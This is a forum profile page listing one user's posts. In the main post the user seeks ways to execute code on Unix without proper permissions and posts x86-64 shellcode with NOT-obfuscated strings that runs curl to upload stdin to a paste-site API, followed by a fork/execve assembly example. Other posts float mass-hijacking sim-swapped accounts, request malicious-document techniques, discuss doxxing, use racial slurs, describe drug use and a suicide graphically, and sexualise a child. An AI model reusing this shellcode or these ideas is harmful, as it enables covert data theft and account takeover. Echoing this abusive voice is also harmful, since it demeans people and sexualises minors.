User Controls
Posts by Sophie
-
2021-07-04 at 4 PM UTC in Building a Distro, that builds Distros | FULL AUTO
-
2021-07-04 at 1:14 AM UTC in Invoking Scripts and Binaries from an Asm program.
-
2021-07-04 at 12:59 AM UTC in Invoking Scripts and Binaries from an Asm program.So i was looking into ways to execute things on *Nix boxes without necessarily having the appropriate permissions to do so. I know about `execve` and i can leverage it to do something like this:
global _start
section .text
_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6c7275632f6e6962
push rbx
mov rbx, 0x2f7273752f2f2f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffffffffb9d2
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffffffffff938d
not rbx
push rbx
mov rbx, 0x8ac28b9e928d9099
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffffffffb9d2
not rbx
push rbx
push rsp
pop r10
push rdx
mov rbx, 0xffffffffd8d2c3c2
not rbx
push rbx
mov rbx, 0x8b919a8b91909cd8
not rbx
push rbx
push rsp
pop r11
push rdx
mov rbx, 0xffd0968f9ed0988d
not rbx
push rbx
mov rbx, 0x90d19a8b8c9e8f9b
not rbx
push rbx
mov rbx, 0xd0d0c58c8f8b8b97
not rbx
push rbx
push rsp
pop r12
push rdx
push rsp
pop rdx
push r12
push r11
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall
And that's fine. But `execve` is a one off. At least as far as i understand it. And at least as far as it is used in my example above.
So i started reading, and i read you could start a shell script with environment variables from your Asm program which was pretty cool. Something like this.
bits 64
[list -]
%include "unistd.inc"
[list +]
section .data
filename: db "test.sh",0
.len: equ $-filename
;... put more arguments here
envp1: db "TESTVAR=123456",0
;... put more environment paraters here
argvPtr: dq filename
; more pointers to arguments here
dq 0 ; terminate the list of pointers with 0
envPtr: dq envp1
dq 0
forkerror: db "fork error",10
.len: equ $-forkerror
execveerror: db "execve error(not expected)",10
.len: equ $-execveerror
wait4error: db "wait4 error",10
.len: equ $-wait4error
section .text
global _start
_start:
syscall fork
and rax,rax
jns .continue
syscall write,stderr,forkerror,forkerror.len
jmp .exit
.continue:
jz .runchild
; wait for child to terminate
syscall wait4, 0, 0, 0, 0
jns .exit
syscall write,stderr,wait4error,wait4error.len
jmp .exit
.runchild:
syscall execve,filename,argvPtr,envPtr
jns .exit
syscall write,stderr,execveerror,execveerror.len
.exit:
syscall exit,0
But then i came across an example that kind of blew my mind. I'll post it below in spoiler tags because it's long. But basically they're starting a terminal and from the program are having the commands they define be executed in that terminal. So does that mean i can basically just write a shell script within an Asm program, invoke a terminal and execute whatever i want?
Thoughts? -
2021-07-02 at 3:05 AM UTC in God hacked my phoneNo i didn't.
-
2021-07-02 at 1:37 AM UTC in I just took a pic of the Ukrainian chick
-
2021-07-02 at 12:28 AM UTC in 3 for 20
-
2021-07-02 at 12:26 AM UTC in Old Nigga Most Likely to Die Next-Death Pool/Gambling
-
2021-07-02 at 12:24 AM UTC in I got Sim-Swap!
Originally posted by SBTlauien Yeah I essentially hacked the phone number back. The day after this happened, I got a couple of SMS messages from my new carrier that had OTP. That was the perp trying to access the account and probably trying to figure out why there was a password on the account.
The sim-swappers are likely making a killing.
I'm still wanting to know what they did to change my PIN. I'm guessing they called and said "I'm an employee at the Boost Mobile store and I need to locate a receipt. Can you give me the activation date so I can look up the receipt?" I bet the phone Rep gave it out.
Makes me wonder how they came across my phone number and email as well.
Others on Reddit also had this happen and the PIN on the accounts were all "13371337"…
I feel like there should be a way to harvest accounts that have been messed with on mass and just enter double l33t to activate and then steal the stolen stuff from the stealers in an epic cyber uno reverse on a mass scale. -
2021-07-02 at 12:14 AM UTC in element.io
-
2021-07-02 at 12:05 AM UTC in 3 for 20
-
2021-07-02 at 12 AM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical informationIf you're uncomfortable with 'little' you can ask me how little and i will give you a compromise number.
-
2021-07-01 at 11:58 PM UTC in Serious Question. Why is everyone here so mean?
-
2021-07-01 at 11:55 PM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical information
Originally posted by Bradley Mostly just wanna fist fight him in person because he said he's a golden gloves boxer or some shit and he's already double my highest (ever) weight so I figure if he can pack a punch like he can pack his ass, it'd be fun to pop out and surprise him.
It's okay though Sophia, my friends have hooked me up. DO you wanna hook up one of htese days? I won't tell your girlfriend/s
The only way we'll ever be any sort of vaguely sexual situation together is if you fly me out to wherever, where you have a sweet little girl for me ready in a room in the same building you will be in. And then you can go fuck her father while i entertain his daughter. The room can even be adjacent to mine, if you keep it down. -
2021-07-01 at 11:42 PM UTC in Serious Question. Why is everyone here so mean?I'm generally nice as long as other people are nice to me.
-
2021-07-01 at 11:28 PM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical information10 bucks is chump change nigga. Also, why you wanna DOX QMR?
-
2021-07-01 at 11 PM UTC in I just took a pic of the Ukrainian chick
-
2021-07-01 at 10:58 PM UTC in How did that fucktard Bill Krozby die?
Originally posted by Bradley To answer your question; after doing large amounts of methamphetamene (code named "tek") he convinced himself Austin Police Department was outside with a dog and a raid was incoming, and tortilla-style blocked off his doorway, in a delerium he decided "Fuck BradleyB and everyone else who cares about me" and decided to use a kitchen knife to open himself up in the wrist and stomach, at some point he decided "Wow this really hurts and I might die" and attempted to undo some of the barricade. There were two pools of blood, one located at the door barricade & one located next to the bed where he was to my knowledge found dead.
It is what it is. Another dead friend, I took it really badly and started drinking again (not because of Bill Krozby but because I wanted to) then got "sober" where I smoked an eighth, did half a dab cart, and a quarter gram of speed a day.
I even had a minor freak out where i incorrectly convinced myself that my roommate had someone over and was colluding to kill me. So I did what any reasonable person does when expecting to meet death on his own terms, I beat on her door until she answered and then barehanded sought to fight my oppositional adversary. Unfortunately it was just her, and I apologized, did two ambien and went to sleep.
But we're not all as cool as I am.
RIP Kr0zd0g, I knew you'd never work.
Jesus. That's a fucked up way to go. If the police were after me and i somehow got the idea in my head to rather die than go to prism i'd probably try to suicide by cop. -
2021-06-25 at 12:06 AM UTC in All the popular minecraft servers have been taken down by @TheTalkingBearWhen i still used Twitter i followed a couple people like TheTalkingBear mostly for the drama, it's mildly amusing but they're mostly just obnoxious. Plus, back then i liked keeping up with all the little 'hacking crews' that wanted to be the new LulzSec. Instead of actually hacking stuff they'd mostly fight among each other. The most amount of 'hacking' that would occur was the occasional DDoS or DB Drop.
-
2021-06-24 at 11:50 PM UTC in What kind of Space Ship would niggasin be?
-
2021-06-24 at 11:38 PM UTC in I got Sim-Swap!Oh i read that wrong. The cum swapper set double l33t as password to activate the number on his end.
Lol he got BTFO'd.
That said, i am still open to receiving any cool MalDoc TTPs should you have some.